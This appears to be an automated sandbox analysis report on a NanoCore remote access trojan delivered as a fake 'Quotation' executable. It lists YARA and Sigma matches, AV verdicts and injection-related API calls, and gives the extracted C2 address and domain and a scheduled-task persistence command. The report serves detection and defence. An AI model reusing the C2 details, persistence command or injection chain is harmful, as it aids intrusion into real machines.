15.2.RegAsm.exe.400000.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
15.2.RegAsm.exe.400000.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
15.2.RegAsm.exe.400000.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
15.2.RegAsm.exe.400000.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
1.2.RegAsm.exe.6670000.4.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
1.2.RegAsm.exe.6670000.4.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xd9ad:$x2: NanoCore.ClientPluginHost 0xea88:$s4: PipeCreated 0xd9c7:$s5: IClientLoggingHost
1.2.RegAsm.exe.6670000.4.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
2.2.Quotation ATB-PR28500KINH.exe.5b40000.1.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
2.2.Quotation ATB-PR28500KINH.exe.5b40000.1.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
2.2.Quotation ATB-PR28500KINH.exe.5b40000.1.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
2.2.Quotation ATB-PR28500KINH.exe.5b40000.1.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
Click to see the 19 entries

Sigma Overview

System Summary:

Sigma detected: NanoCore

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 3392, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

Sigma detected: Scheduled temp file as task from temp location

Show sources

Source: Process started

Author: Joe Security: Data: Command: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpAC5D.tmp', CommandLine: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpAC5D.tmp', CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentProcessId: 3392, ProcessCommandLine: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpAC5D.tmp', ProcessId: 5816

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: RegAsm.exe.3392.1.memstr

Malware Configuration Extractor: NanoCore {"C2: ": ["185.140.53.139"], "Version: ": "NanoCore Client, Version=1.2.2.0"}

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\7redfg

ReversingLabs: Detection: 27%

Multi AV Scanner detection for submitted file

Show sources

Source: Quotation ATB-PR28500KINH.exe

ReversingLabs: Detection: 27%

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 0000000F.00000002.304004800.0000000002D41000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.503999050.00000000040E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.497351250.0000000000B1E000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.497878671.0000000001474000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.303385478.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.505763687.0000000005342000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.504002256.0000000004101000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.304067682.0000000003D49000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.515094519.0000000005B42000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.495967274.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.507063640.0000000006670000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.503615613.00000000038A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7160, type: MEMORY
Source: Yara match	File source: Process Memory Space: Quotation ATB-PR28500KINH.exe PID: 7036, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3392, type: MEMORY
Source: Yara match	File source: Process Memory Space: Quotation ATB-PR28500KINH.exe PID: 6248, type: MEMORY
Source: Yara match	File source: 1.2.RegAsm.exe.6670000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Quotation ATB-PR28500KINH.exe.5340000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RegAsm.exe.6670000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Quotation ATB-PR28500KINH.exe.5b40000.1.unpack, type: UNPACKEDPE

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HJdyTuap.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\7redfg	Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: Quotation ATB-PR28500KINH.exe

Joe Sandbox ML: detected

Source: 15.2.RegAsm.exe.400000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 0.2.Quotation ATB-PR28500KINH.exe.5340000.1.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 1.2.RegAsm.exe.400000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 2.2.Quotation ATB-PR28500KINH.exe.5b40000.1.unpack	Avira: Label: TR/Dropper.MSIL.Gen7

Source: global traffic

TCP traffic: 192.168.2.7:49725 -> 185.140.53.139:6184

Source: Joe Sandbox View

ASN Name: DAVID_CRAIGGG DAVID_CRAIGGG

Source: unknown

DNS traffic detected: queries for: kengeorge.zapto.org

Source: RegAsm.exe, 00000001.00000002.503999050.00000000040E9000.00000004.00000001.sdmp

Binary or memory string: RegisterRawInputDevices

E-Banking Fraud:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 0000000F.00000002.304004800.0000000002D41000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.503999050.00000000040E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.497351250.0000000000B1E000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.497878671.0000000001474000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.303385478.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.505763687.0000000005342000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.504002256.0000000004101000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.304067682.0000000003D49000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.515094519.0000000005B42000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.495967274.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.507063640.0000000006670000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.503615613.00000000038A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7160, type: MEMORY
Source: Yara match	File source: Process Memory Space: Quotation ATB-PR28500KINH.exe PID: 7036, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3392, type: MEMORY
Source: Yara match	File source: Process Memory Space: Quotation ATB-PR28500KINH.exe PID: 6248, type: MEMORY
Source: Yara match	File source: 1.2.RegAsm.exe.6670000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Quotation ATB-PR28500KINH.exe.5340000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RegAsm.exe.6670000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Quotation ATB-PR28500KINH.exe.5b40000.1.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 0000000F.00000002.304004800.0000000002D41000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000001.00000002.503999050.00000000040E9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000002.497351250.0000000000B1E000.00000004.00000020.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000002.497351250.0000000000B1E000.00000004.00000020.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000002.497878671.0000000001474000.00000004.00000020.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000002.00000002.497878671.0000000001474000.00000004.00000020.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000001.00000002.506528891.0000000005AA0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000F.00000002.303385478.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000F.00000002.303385478.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000002.505763687.0000000005342000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000002.505763687.0000000005342000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000002.504002256.0000000004101000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000002.00000002.504002256.0000000004101000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000F.00000002.304067682.0000000003D49000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000002.515094519.0000000005B42000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000002.00000002.515094519.0000000005B42000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000001.00000002.495967274.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000001.00000002.495967274.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000001.00000002.507063640.0000000006670000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000002.503615613.00000000038A1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000002.503615613.00000000038A1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: RegAsm.exe PID: 7160, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: RegAsm.exe PID: 7160, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: Quotation ATB-PR28500KINH.exe PID: 7036, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: Quotation ATB-PR28500KINH.exe PID: 7036, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: RegAsm.exe PID: 3392, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: RegAsm.exe PID: 3392, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: Quotation ATB-PR28500KINH.exe PID: 6248, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: Quotation ATB-PR28500KINH.exe PID: 6248, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 1.2.RegAsm.exe.6670000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 1.2.RegAsm.exe.5aa0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.Quotation ATB-PR28500KINH.exe.5340000.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.Quotation ATB-PR28500KINH.exe.5340000.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 15.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 15.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 1.2.RegAsm.exe.6670000.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.2.Quotation ATB-PR28500KINH.exe.5b40000.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.2.Quotation ATB-PR28500KINH.exe.5b40000.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>

Initial sample is a PE file and has a suspicious name

Show sources

Source: initial sample

Static PE information: Filename: Quotation ATB-PR28500KINH.exe

Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 0_2_05081D7F NtOpenFile,NtCreateFile,NtWriteFile,	0_2_05081D7F
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 0_2_05081C09 NtDelayExecution,	0_2_05081C09
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 0_2_05081C2B NtQueryInformationProcess,NtOpenFile,NtAllocateVirtualMemory,NtReadFile,	0_2_05081C2B
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 0_2_050800AD NtOpenSection,NtMapViewOfSection,	0_2_050800AD
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 0_2_05091C09 CreateProcessW,NtQueryInformationProcess,NtReadVirtualMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtWriteVirtualMemory,NtGetContextThread,NtSetContextThread,NtResumeThread,	0_2_05091C09
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 0_2_050900AD NtOpenSection,NtMapViewOfSection,	0_2_050900AD
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 2_2_05861D7F NtOpenFile,NtCreateFile,NtWriteFile,	2_2_05861D7F
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 2_2_058600AD NtOpenSection,NtMapViewOfSection,	2_2_058600AD
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 2_2_05861C09 NtDelayExecution,	2_2_05861C09
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 2_2_05861C2B NtQueryInformationProcess,NtOpenFile,NtAllocateVirtualMemory,NtReadFile,	2_2_05861C2B
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 2_2_058800AD NtOpenSection,NtMapViewOfSection,	2_2_058800AD
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 2_2_05881C09 CreateProcessW,NtQueryInformationProcess,NtReadVirtualMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtWriteVirtualMemory,NtGetContextThread,NtSetContextThread,NtResumeThread,	2_2_05881C09

Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 0_2_00586FB9	0_2_00586FB9
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 0_2_02719620	0_2_02719620
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 0_2_027104F0	0_2_027104F0
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 0_2_027104E1	0_2_027104E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_0172E471	1_2_0172E471
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_0172E480	1_2_0172E480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_0172BBD4	1_2_0172BBD4
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 2_2_00D96FB9	2_2_00D96FB9
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 2_2_016104E1	2_2_016104E1
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 2_2_016104F0	2_2_016104F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_011BE471	15_2_011BE471
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_011BE480	15_2_011BE480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_011BBBD4	15_2_011BBBD4

Source: Quotation ATB-PR28500KINH.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 7redfg.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: HJdyTuap.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: Quotation ATB-PR28500KINH.exe, 00000000.00000003.459948402.000000000458F000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameeCdkqFqNwYfJsCgC.bounce.exe4 vs Quotation ATB-PR28500KINH.exe
Source: Quotation ATB-PR28500KINH.exe, 00000000.00000002.506982350.0000000006F10000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs Quotation ATB-PR28500KINH.exe
Source: Quotation ATB-PR28500KINH.exe, 00000000.00000002.507388592.0000000007000000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs Quotation ATB-PR28500KINH.exe
Source: Quotation ATB-PR28500KINH.exe, 00000000.00000002.507388592.0000000007000000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs Quotation ATB-PR28500KINH.exe
Source: Quotation ATB-PR28500KINH.exe, 00000002.00000002.507553102.0000000004C96000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameeCdkqFqNwYfJsCgC.bounce.exe4 vs Quotation ATB-PR28500KINH.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior

Source: 0000000F.00000002.304004800.0000000002D41000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000001.00000002.503999050.00000000040E9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000002.497351250.0000000000B1E000.00000004.00000020.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000002.497351250.0000000000B1E000.00000004.00000020.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000002.00000002.497878671.0000000001474000.00000004.00000020.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000002.00000002.497878671.0000000001474000.00000004.00000020.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000001.00000002.506528891.0000000005AA0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000001.00000002.506528891.0000000005AA0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000F.00000002.303385478.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000F.00000002.303385478.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000002.505763687.0000000005342000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000002.505763687.0000000005342000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000002.00000002.504002256.0000000004101000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000002.00000002.504002256.0000000004101000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000F.00000002.304067682.0000000003D49000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000002.00000002.515094519.0000000005B42000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000002.00000002.515094519.0000000005B42000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000001.00000002.495967274.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000001.00000002.495967274.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
